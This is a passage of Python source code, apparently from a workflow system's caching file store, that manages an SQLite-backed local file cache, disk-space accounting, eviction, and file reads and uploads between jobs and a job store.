# only one of them is working on uploading any given file at any given
# time.
self.commitThread = None
@classmethod
def _ensureTables(cls, con):
"""
Ensure that the database tables we expect exist.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS files (
id TEXT NOT NULL PRIMARY KEY,
path TEXT UNIQUE NOT NULL,
size INT NOT NULL,
state TEXT NOT NULL,
owner INT
)
""")
cur.execute("""
CREATE TABLE IF NOT EXISTS refs (
path TEXT NOT NULL,
file_id TEXT NOT NULL,
job_id TEXT NOT NULL,
state TEXT NOT NULL,
PRIMARY KEY (path, file_id)
)
""")
cur.execute("""
CREATE TABLE IF NOT EXISTS jobs (
id TEXT NOT NULL PRIMARY KEY,
tempdir TEXT NOT NULL,
disk INT NOT NULL,
worker INT
)
""")
cur.execute("""
CREATE TABLE IF NOT EXISTS properties (
name TEXT NOT NULL PRIMARY KEY,
value INT NOT NULL
)
""")
con.commit()
# Caching-specific API
def getCacheLimit(self):
"""
Return the total number of bytes to which the cache is limited.
If no limit is available, raises an error.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('maxSpace',)):
return row[0]
raise RuntimeError('Unable to retrieve cache limit')
def getCacheUsed(self):
"""
Return the total number of bytes used in the cache.
If no value is available, raises an error.
"""
# Space never counts as used if caching is free
if self.cachingIsFree():
return 0
for row in self.cur.execute('SELECT TOTAL(size) FROM files'):
return row[0]
raise RuntimeError('Unable to retrieve cache usage')
def getCacheExtraJobSpace(self):
"""
Return the total number of bytes of disk space requested by jobs
running against this cache but not yet used.
We can get into a situation where the jobs on the node take up all its
space, but then they want to write to or read from the cache. So when
that happens, we need to debit space from them somehow...
If no value is available, raises an error.
"""
# Total up the sizes of all the reads of files and subtract it from the total disk reservation of all jobs
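# i.e. extraJobSpace = TOTAL(jobs.disk) - TOTAL(size of files with 'immutable' references)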
for row in self.cur.execute("""
SELECT (
(SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state == 'immutable')
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve extra job space')
def getCacheAvailable(self):
"""
Return the total number of free bytes available for caching, or, if
negative, the total number of bytes of cached files that need to be
evicted to free up enough space for all the currently scheduled jobs.
If no value is available, raises an error.
"""
# Get the max space on our disk.
# Subtract out the number of bytes of cached content.
# Also subtract out the number of bytes of job disk requirements that
# aren't being spent by those jobs on immutable references to cached
# content.
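# i.e. available = maxSpace - TOTAL(files.size) - (TOTAL(jobs.disk) - TOTAL(size of files with 'immutable' references))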
# Do a little report first
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
logger.debug('Max space: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(size) FROM files"):
logger.debug('Total file size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(disk) FROM jobs"):
logger.debug('Total job disk requirement size: %d', row[0])
for row in self.cur.execute("SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'"):
logger.debug('Total immutable reference size: %d', row[0])
if self.cachingIsFree():
# If caching is free, we just say that all the space is always available.
for row in self.cur.execute("SELECT value FROM properties WHERE name = 'maxSpace'"):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(size) FROM files) -
((SELECT TOTAL(disk) FROM jobs) -
(SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.state = 'immutable'))
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve available cache space')
def getSpaceUsableForJobs(self):
"""
Return the total number of bytes that are not taken up by job requirements, ignoring files and file usage.
We can't ever run more jobs than we actually have room for, even with caching.
If not retrievable, raises an error.
"""
for row in self.cur.execute("""
SELECT (
(SELECT value FROM properties WHERE name = 'maxSpace') -
(SELECT TOTAL(disk) FROM jobs)
) as result
"""):
return row[0]
raise RuntimeError('Unable to retrieve usable space for jobs')
def getCacheUnusedJobRequirement(self):
"""
Return the total number of bytes of disk space requested by the current
job and not used by files the job is using in the cache.
Mutable references don't count, but immutable/uploading ones do.
If no value is available, raises an error.
"""
logger.debug('Get unused space for job %s', self.jobID)
for row in self.cur.execute('SELECT * FROM files'):
logger.debug('File record: %s', str(row))
for row in self.cur.execute('SELECT * FROM refs'):
logger.debug('Ref record: %s', str(row))
for row in self.cur.execute('SELECT TOTAL(files.size) FROM refs INNER JOIN files ON refs.file_id = files.id WHERE refs.job_id = ? AND refs.state != ?',
(self.jobID, 'mutable')):
# Sum up all the sizes of our referenced files, then subtract that from how much we came in with
return self.jobDiskBytes - row[0]
raise RuntimeError('Unable to retrieve unused job requirement space')
def adjustCacheLimit(self, newTotalBytes):
"""
Adjust the total cache size limit to the given number of bytes.
"""
self.cur.execute('UPDATE properties SET value = ? WHERE name = ?', (newTotalBytes, 'maxSpace'))
self.con.commit()
def fileIsCached(self, fileID):
"""
Return true if the given file is currently cached, and false otherwise.
Note that this can't really be relied upon because a file may go cached
-> deleting after you look at it. If you need to do something with the
file you need to do it in a transaction.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(fileID, 'cached', 'uploadable', 'uploading')):
return row[0] > 0
return False
def getFileReaderCount(self, fileID):
"""
Return the number of current outstanding reads of the given file.
Counts mutable references too.
"""
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE file_id = ?', (fileID,)):
return row[0]
return 0
def cachingIsFree(self):
"""
Return true if files can be cached for free, without taking up space.
Return false otherwise.
This will be true when working with certain job stores in certain
configurations, most notably the FileJobStore.
"""
for row in self.cur.execute('SELECT value FROM properties WHERE name = ?', ('freeCaching',)):
return row[0] == 1
# Otherwise we need to set it
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore) and not self.forceNonFreeCaching:
# Caching may be free since we are using a file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out to a generated name.
destDir = tempfile.mkdtemp(dir=self.localCacheDir)
cachedFile = os.path.join(destDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
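# A link count of 2 means the job store handed us a hard link to its own
# copy: the cached file and the job store file share an inode, so cached
# reads consume no extra space.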
if os.stat(cachedFile).st_nlink == 2:
# Caching must be free
free = 1
else:
# If we only have one link, caching costs disk.
free = 0
# Clean up
os.unlink(cachedFile)
os.rmdir(destDir)
self.jobStore.deleteFile(emptyID)
else:
# Caching is only ever free with the file job store
free = 0
# Save to the database if we're the first to work this out
self.cur.execute('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('freeCaching', free))
self.con.commit()
# Return true if we said caching was free
return free == 1
# Internal caching logic
def _getNewCachingPath(self, fileStoreID):
"""
Get a path at which the given file ID can be cached.
Will be unique for every call.
The file will not be created if it does not exist.
"""
# Hash the file ID
hasher = hashlib.sha1()
hasher.update(fileStoreID.encode('utf-8'))
# Get a unique temp file name, including the file ID's hash to make
# sure we can never collide even though we are going to remove the
# file.
# TODO: use a de-slashed version of the ID instead?
handle, path = tempfile.mkstemp(dir=self.localCacheDir, suffix=hasher.hexdigest())
os.close(handle)
os.unlink(path)
return path
def _stealWorkFromTheDead(self):
"""
Take ownership of any files we can see whose owners have died.
We don't actually process them here. We take action based on the states of files we own later.
"""
pid = os.getpid()
# Get a list of all file owner processes on this node.
# Exclude NULL because it comes out as 0 and we can't look for PID 0.
owners = []
for row in self.cur.execute('SELECT DISTINCT owner FROM files WHERE owner IS NOT NULL'):
owners.append(row[0])
# Work out which of them have died.
# TODO: use GUIDs or something to account for PID re-use?
deadOwners = []
for owner in owners:
if not self._pidExists(owner):
deadOwners.append(owner)
for owner in deadOwners:
# Try and adopt all the files that any dead owner had
# If they were deleting, we delete
self.cur.execute('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(pid, 'deleting', owner, 'deleting'))
# If they were downloading, we delete. Any outstanding references
# can't be in use since they are from the dead downloader.
self.cur.execute('UPDATE files SET owner = ?, state = ? WHERE owner = ? AND state = ?',
(pid, 'deleting', owner, 'downloading'))
# If they were uploading or uploadable, we mark as cached even
# though it never made it to the job store (and leave it unowned).
#
# Once the dead job that it was being uploaded from is cleaned up,
# and there are no longer any immutable references, it will be
# evicted as normal. Since the dead job can't have been marked
# successfully completed (since the file is still not uploaded),
# nobody is allowed to actually try and use the file.
#
# TODO: if we ever let other PIDs be responsible for writing our
# files asynchronously, this will need to change.
self.cur.execute('UPDATE files SET owner = NULL, state = ? WHERE owner = ? AND (state = ? OR state = ?)',
('cached', owner, 'uploadable', 'uploading'))
self.con.commit()
logger.debug('Tried to adopt file operations from dead worker %d', owner)
@classmethod
def _executePendingDeletions(cls, con, cur):
"""
Delete all the files that are registered in the database as in the
process of being deleted from the cache by us.
Returns the number of files that were deleted.
Implemented as a class method so it can use the database connection
appropriate to its thread without any chance of getting at the main
thread's connection and cursor in self.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
pid = os.getpid()
# Remember the file IDs we are deleting
deletedFiles = []
for row in cur.execute('SELECT id, path FROM files WHERE owner = ? AND state = ?', (pid, 'deleting')):
# Grab everything we are supposed to delete and delete it
fileID = row[0]
filePath = row[1]
try:
os.unlink(filePath)
except OSError:
# Probably already deleted
continue
# Whether we deleted the file or just found out that it is gone, we
# need to take credit for deleting it so that we remove it from the
# database.
deletedFiles.append(fileID)
for fileID in deletedFiles:
# Drop all the files. They should have stayed in deleting state. We move them from there to not present at all.
cur.execute('DELETE FROM files WHERE id = ? AND state = ?', (fileID, 'deleting'))
# Also drop their references, if they had any from dead downloaders.
cur.execute('DELETE FROM refs WHERE file_id = ?', (fileID,))
con.commit()
return len(deletedFiles)
def _executePendingUploads(self, con, cur):
"""
Uploads all files in uploadable state that we own.
Returns the number of files that were uploaded.
Needs access to self to get at the job store for uploading files, but
still needs to take con and cur so it can run in a thread with the
thread's database connection.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
"""
# Work out who we are
pid = os.getpid()
# Record how many files we upload
uploadedCount = 0
while True:
# Try and find a file we might want to upload
fileID = None
filePath = None
for row in cur.execute('SELECT id, path FROM files WHERE state = ? AND owner = ? LIMIT 1', ('uploadable', pid)):
fileID = row[0]
filePath = row[1]
if fileID is None:
# Nothing else exists to upload
break
# We need to set it to uploading in a way that we can detect that *we* won the update race instead of anyone else.
cur.execute('UPDATE files SET state = ? WHERE id = ? AND state = ?', ('uploading', fileID, 'uploadable'))
con.commit()
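# cur.rowcount reflects the last execute on this cursor: 1 means our UPDATE
# flipped the row from 'uploadable' to 'uploading', 0 means someone else won.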
if cur.rowcount != 1:
# We didn't manage to update it. Someone else (a running job if
# we are a committing thread, or vice versa) must have grabbed
# it.
logger.debug('Lost race to upload %s', fileID)
# Try again to see if there is something else to grab.
continue
# Upload the file
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, filePath)
# Count it for the total uploaded files value we need to return
uploadedCount += 1
# Remember that we uploaded it in the database
cur.execute('UPDATE files SET state = ?, owner = NULL WHERE id = ?', ('cached', fileID))
con.commit()
return uploadedCount
def _allocateSpaceForJob(self, newJobReqs):
"""
A new job is starting that needs newJobReqs space.
We need to record that we have a job running now that needs this much space.
We also need to evict enough stuff from the cache so that we have room
for this job to fill up that much space even if it doesn't cache
anything.
localTempDir must have already been pointed to the job's temp dir.
:param float newJobReqs: the total number of bytes that this job requires.
"""
# Put an entry in the database for this job being run on this worker.
# This will take up space for us and potentially make the cache over-full.
# But we won't actually let the job run and use any of this space until
# the cache has been successfully cleared out.
pid = os.getpid()
self.cur.execute('INSERT INTO jobs VALUES (?, ?, ?, ?)', (self.jobID, self.localTempDir, newJobReqs, pid))
self.con.commit()
# Now we need to make sure that we can fit all currently cached files,
# and the parts of the total job requirements not currently spent on
# cached files, in under the total disk space limit.
available = self.getCacheAvailable()
logger.debug('Available space with job: %d bytes', available)
if available >= 0:
# We're fine on disk space
return
# Otherwise we need to clear stuff.
self._freeUpSpace()
@classmethod
def _removeJob(cls, con, cur, jobID):
"""
Get rid of the job with the given ID.
The job must be owned by us.
Deletes the job's database entry, all its references, and its whole
temporary directory.
:param sqlite3.Connection con: Connection to the cache database.
:param sqlite3.Cursor cur: Cursor in the cache database.
:param str jobID: Hash-based ID of the job being removed. Not a Toil JobStore ID.
"""
# Get the job's temp dir
for row in cur.execute('SELECT tempdir FROM jobs WHERE id = ?', (jobID,)):
jobTemp = row[0]
for row in cur.execute('SELECT path FROM refs WHERE job_id = ?', (jobID,)):
try:
# Delete all the reference files.
os.unlink(row[0])
except OSError:
# May not exist
pass
# And their database entries
cur.execute('DELETE FROM refs WHERE job_id = ?', (jobID,))
con.commit()
try:
# Delete the job's temp directory to the extent that we can.
shutil.rmtree(jobTemp)
except OSError:
pass
# Strike the job from the database
cur.execute('DELETE FROM jobs WHERE id = ?', (jobID,))
con.commit()
def _deallocateSpaceForJob(self):
"""
Our current job that was using oldJobReqs space has finished.
We need to record that the job is no longer running, so its space not
taken up by files in the cache will be free.
"""
self._removeJob(self.con, self.cur, self.jobID)
def _tryToFreeUpSpace(self):
"""
If disk space is overcommitted, try one round of collecting files to upload/download/delete/evict.
Return whether we manage to get any space freed or not.
"""
# First we want to make sure that dead jobs aren't holding
# references to files and keeping them from looking unused.
self._removeDeadJobs(self.con)
# Adopt work from any dead workers
self._stealWorkFromTheDead()
if self._executePendingDeletions(self.con, self.cur) > 0:
# We actually had something to delete, which we deleted.
# Maybe there is space now
logger.debug('Successfully executed pending deletions to free space')
return True
if self._executePendingUploads(self.con, self.cur) > 0:
# We had something to upload. Maybe it can be evicted now.
logger.debug('Successfully executed pending uploads to free space')
return True
# Otherwise, not enough files could be found in deleting state to solve our problem.
# We need to put something into the deleting state.
# TODO: give other people time to finish their in-progress
# evictions before starting more, or we might evict everything as
# soon as we hit the cache limit.
# Find something that has no non-mutable references and is not already being deleted.
self.cur.execute("""
SELECT files.id FROM files WHERE files.state = 'cached' AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
) LIMIT 1
""")
row = self.cur.fetchone()
if row is None:
# Nothing can be evicted by us.
# Someone else might be in the process of evicting something that will free up space for us too.
# Or someone might be uploading something and we have to wait for them to finish before it can be deleted.
logger.debug('Could not find anything to evict! Cannot free up space!')
return False
# Otherwise we found an eviction candidate.
fileID = row[0]
# Work out who we are
pid = os.getpid()
# Try and grab it for deletion, subject to the condition that nothing has started reading it
self.cur.execute("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(pid, 'deleting', fileID, 'cached'))
self.con.commit()
logger.debug('Evicting file %s', fileID)
# Whether we actually got it or not, try deleting everything we have to delete
if self._executePendingDeletions(self.con, self.cur) > 0:
# We deleted something
logger.debug('Successfully executed pending deletions to free space')
return True
# We could not free anything this round; report no progress so the caller can wait or give up.
return False
def _freeUpSpace(self):
"""
If disk space is overcommitted, block and evict eligible things from the
cache until it is no longer overcommitted.
"""
availableSpace = self.getCacheAvailable()
# Track how long we are willing to wait for cache space to free up without making progress evicting things before we give up.
# This is the longest that we will wait for uploads and other deleters.
patience = 10
while availableSpace < 0:
# While there isn't enough space for the thing we want
logger.debug('Cache is full (%d bytes free). Trying to free up space!', availableSpace)
# Free up space. See if we made any progress
progress = self._tryToFreeUpSpace()
availableSpace = self.getCacheAvailable()
if progress:
# Reset our patience
patience = 10
else:
# See if we've been oversubscribed.
jobSpace = self.getSpaceUsableForJobs()
if jobSpace < 0:
logger.critical('Jobs on this machine have oversubscribed our total available space (%d bytes)!', jobSpace)
raise CacheUnbalancedError
else:
patience -= 1
if patience <= 0:
logger.critical('Waited implausibly long for active uploads and deletes.')
raise CacheUnbalancedError
else:
# Wait a bit and come back
time.sleep(2)
logger.debug('Cache has %d bytes free.', availableSpace)
# Normal AbstractFileStore API
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
# Move self.localTempDir from the worker directory set up in __init__ to a per-job directory.
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the database, clean them up ourselves.
self._removeDeadJobs(self.con)
# Get the requirements for the job.
self.jobDiskBytes = job.disk
logger.debug('Actually running job (%s) with ID (%s) which wants %d of our %d bytes.',
self.jobName, self.jobID, self.jobDiskBytes, self.getCacheLimit())
# Register the current job as taking this much space, and evict files
# from the cache to make room before letting the job run.
self._allocateSpaceForJob(self.jobDiskBytes)
try:
os.chdir(self.localTempDir)
yield
finally:
# See how much disk space is used at the end of the job.
# Not a real peak disk usage, but close enough to be useful for warning the user.
# TODO: Push this logic into the abstract file store
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / self.jobDiskBytes * 100 if
self.jobDiskBytes > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(self.jobDiskBytes),
requestedDisk=self.jobDiskBytes))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > self.jobDiskBytes:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
# Go back up to the per-worker local temp directory.
os.chdir(startingDir)
self.cleanupInProgress = True
# Record that our job is no longer using its space, and clean up
# its temp dir and database entry.
self._deallocateSpaceForJob()
def writeGlobalFile(self, localFileName, cleanup=False):
# Work out the file itself
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
# And get its size
fileSize = os.stat(absLocalFileName).st_size
# Work out who is making the file
creatorID = self.jobGraph.jobStoreID
# Create an empty file to get an ID.
# TODO: this empty file could leak if we die now...
fileID = self.jobStore.getEmptyFileStoreID(creatorID, cleanup)
# Work out who we are
pid = os.getpid()
# Work out where the file ought to go in the cache
cachePath = self._getNewCachingPath(fileID)
# Create a file in uploadable state and a reference, in the same transaction.
# Say the reference is an immutable reference
self.cur.execute('INSERT INTO files VALUES (?, ?, ?, ?, ?)', (fileID, cachePath, fileSize, 'uploadable', pid))
self.cur.execute('INSERT INTO refs VALUES (?, ?, ?, ?)', (absLocalFileName, fileID, creatorID, 'immutable'))
self.con.commit()
if absLocalFileName.startswith(self.localTempDir):
# We should link into the cache, because the upload is coming from our local temp dir
try:
# Try and hardlink the file into the cache.
# This can only fail if the system doesn't have hardlinks, or the
# file we're trying to link to has too many hardlinks to it
# already, or something.
os.link(absLocalFileName, cachePath)
linkedToCache = True
logger.debug('Linked file %s into cache at %s; deferring write to job store', localFileName, cachePath)
# Don't do the upload now. Let it be deferred until later (when the job is committing).
except OSError:
# We couldn't make the link for some reason
linkedToCache = False
else:
# The tests insist that if you are uploading a file from outside
# the local temp dir, it should not be linked into the cache.
linkedToCache = False
if not linkedToCache:
# If we can't do the link into the cache and upload from there, we
# have to just upload right away. We can't guarantee sufficient
# space to make a full copy in the cache, if we aren't allowed to
# take this copy away from the writer.
# Change the reference to 'mutable', which it will be
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', absLocalFileName, fileID))
# And drop the file altogether
self.cur.execute('DELETE FROM files WHERE id = ?', (fileID,))
self.con.commit()
# Save the file to the job store right now
logger.debug('Actually executing upload for file %s', fileID)
self.jobStore.updateFile(fileID, absLocalFileName)
# Ship out the completed FileID object with its real size.
return FileID.forPath(fileID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
if fileStoreID in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
if userPath is not None:
# Validate the destination we got
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError('File %s exists. Cannot overwrite.' % localFilePath)
else:
# Make our own destination
localFilePath = self.getLocalTempFileName()
# Work out who we are
pid = os.getpid()
# And what job we are operating on behalf of
readerID = self.jobGraph.jobStoreID
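# Dispatch on the requested read mode:
#   cache + immutable -> link out of the cache (fall back to copying)
#   cache + mutable   -> copy out of the cache (may give the cached copy away)
#   no cache          -> read straight from the job store (or from a pending upload)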
if cache:
# We want to use the cache
if mutable:
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
return self._readGlobalFileWithCache(fileStoreID, localFilePath, symlink, readerID)
else:
# We do not want to use the cache
return self._readGlobalFileWithoutCache(fileStoreID, localFilePath, mutable, symlink, readerID)
def _readGlobalFileWithoutCache(self, fileStoreID, localFilePath, mutable, symlink, readerID):
"""
Read a file without putting it into the cache.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool mutable: Whether a mutable copy should be created, instead of a hard link or symlink.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# We would like to read directly from the backing job store, since
# we don't want to cache the result. However, we may be trying to
# read a file that is 'uploadable' or 'uploading' and hasn't hit
# the backing job store yet.
# Try and make a 'copying' reference to such a file
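# The INSERT ... SELECT only produces a row when the file actually exists in
# one of those states, so the state check and the reference creation happen
# in a single atomic statement.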
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'uploadable', 'uploading'))
self.con.commit()
# See if we got it
have_reference = False
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID)):
have_reference = row[0] > 0
if have_reference:
# If we succeed, copy the file. We know the job has space for it
# because if we didn't do this we'd be getting a fresh copy from
# the job store.
# Find where the file is cached
cachedPath = None
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if cachedPath is None:
raise RuntimeError('File %s went away while we had a reference to it!' % fileStoreID)
with open(localFilePath, 'wb') as outStream:
with open(cachedPath, 'rb') as inStream:
# Copy it
shutil.copyfileobj(inStream, outStream)
# Change the reference to mutable
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? and file_id = ?', ('mutable', localFilePath, fileStoreID))
self.con.commit()
else:
# If we fail, the file isn't cached here in 'uploadable' or
# 'uploading' state, so that means it must actually be in the
# backing job store, so we can get it from the backing job store.
# Create a 'mutable' reference (even if we end up with a link)
# so we can see this file in deleteLocalFile.
self.cur.execute('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'mutable'))
self.con.commit()
# Just read directly
if mutable or self.forceNonFreeCaching:
# Always copy
with open(localFilePath, 'wb') as outStream:
with self.jobStore.readFileStream(fileStoreID) as inStream:
shutil.copyfileobj(inStream, outStream)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
# Now we got the file, somehow.
return localFilePath
def _downloadToCache(self, fileStoreID, cachedPath):
"""
Copy a file from the file store into the cache.
Will hardlink if appropriate.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute destination path in the cache. Already known not to exist.
"""
if self.forceNonFreeCaching:
# Always copy
with open(cachedPath, 'wb') as outStream:
with self.jobStore.readFileStream(fileStoreID) as inStream:
shutil.copyfileobj(inStream, outStream)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, cachedPath, symlink=False)
def _readGlobalFileMutablyWithCache(self, fileStoreID, localFilePath, readerID):
"""
Read a mutable copy of a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Work out who we are
pid = os.getpid()
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self.cur.execute('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, fileStoreID.size, 'downloading', pid))
self.con.commit()
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', pid))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Now, we may have to immediately give away this file, because
# we don't have space for two copies.
# If so, we can't let it go to cached state, because someone
# else might make a reference to it, and we may get stuck with
# two readers, one cached copy, and space for two copies total.
# Make the copying reference
self.cur.execute('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'copying'))
self.con.commit()
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable or copying reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'cached', 'uploadable', 'uploading'))
self.con.commit()
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
while self.getCacheAvailable() < 0:
# Since we now have a copying reference, see if we have used too much space.
# If so, try to free up some space by deleting or uploading, but
# don't loop forever if we can't get enough.
self._tryToFreeUpSpace()
if self.getCacheAvailable() >= 0:
# We made room
break
# See if we have no other references and we can give away the file.
# Change it to downloading owned by us if we can grab it.
self.cur.execute("""
UPDATE files SET owner = ?, state = ? WHERE id = ? AND state = ?
AND owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(pid, 'downloading', fileStoreID, 'cached'))
self.con.commit()
if self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath):
# We got ownership of the file and managed to give it away.
return localFilePath
# If we don't have space, and we couldn't make space, and we
# couldn't get exclusive control of the file to give it away, we
# need to wait for one of those people with references to the file
# to finish and give it up.
# TODO: work out if that will never happen somehow.
# OK, now we have space to make a copy. Do it
shutil.copyfile(cachedPath, localFilePath)
# Change the reference to mutable
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))
self.con.commit()
# Now we're done
return localFilePath
else:
# We didn't get a reference. Maybe it is still downloading.
logger.debug('Could not obtain reference to file %s', fileStoreID)
# Loop around again and see if either we can download it or we can get a reference to it.
# If we didn't get a download or a reference, adopt and do work
# from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.con, self.cur)
def _fulfillCopyingReference(self, fileStoreID, cachedPath, localFilePath):
"""
For use when you own a file in 'downloading' state, and have a
'copying' reference to it.
Makes a full copy from the cache, and changes 'downloading' file state
to 'cached', if space can be found, or gives away the cached copy if
space cannot be found.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
"""
if self.getCacheAvailable() < 0:
self._tryToFreeUpSpace()
if self.getCacheAvailable() < 0:
# No space for the cached copy and this copy. Give this copy away.
assert self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath)
return
# Otherwise we have space for the cached copy and the user copy.
# Expose this file as cached so other people can copy off of it too.
# Change state from downloading to cached
self.cur.execute('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))
self.con.commit()
# Make our copy
shutil.copyfile(cachedPath, localFilePath)
# Change our reference to mutable
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))
self.con.commit()
# Now we're done
return
def _giveAwayDownloadingFile(self, fileStoreID, cachedPath, localFilePath):
"""
Move a downloaded file in 'downloading' state, owned by us, from the cache to a user-specified destination path.
Used when there's no room for both a cached copy of the file and the user's actual mutable copy.
Returns true if the file was moved, and false if the file was not owned by us in 'downloading' state.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:return: True if the file is successfully moved. False if the file is not owned by us in 'downloading' state.
